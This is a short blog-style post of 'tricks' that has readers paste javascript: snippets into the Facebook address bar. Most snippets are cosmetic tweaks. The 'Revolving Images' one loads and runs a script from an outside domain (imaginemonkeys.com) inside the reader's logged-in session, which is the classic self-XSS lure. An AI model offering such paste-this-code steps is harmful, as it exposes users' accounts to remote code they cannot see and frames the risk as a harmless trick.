Java Coding Trick


Hello all, In this post I will show you some java tricks. So let's open up your Facebook account and click on address bar. Now copy any java script code give below and paste in the address bar. These different codes are for the different tricks.

Note : This trick will work on pc or lappy only...
javascript:void(document.getElementById('fb_menubar').style.background='red');


Changing Title


javascript:void(document.title="Facebook | eugines.info");


Chat Display


javascript:chatDisplay.tabs[321].tabXOnClick();


Chat Status


javascript:presence.toggleTab('chat_status_control','chat_status_control_tab');

Buddy List


javascript:buddyList.toggleTab();




Revolving Images




javascript:(a = (b = document).createElement("script")).src = "//imaginemonkeys.com/majic.js?show", b.body.appendChild(a); void(0)


Edit Facebook.com


Firstly go to facebook.com 


paste the below code in the address bar


JavaScript:document.body.contentEditable='true'; document.designMode='on'; void 0




Press Enter thats it you can now edit the webpage.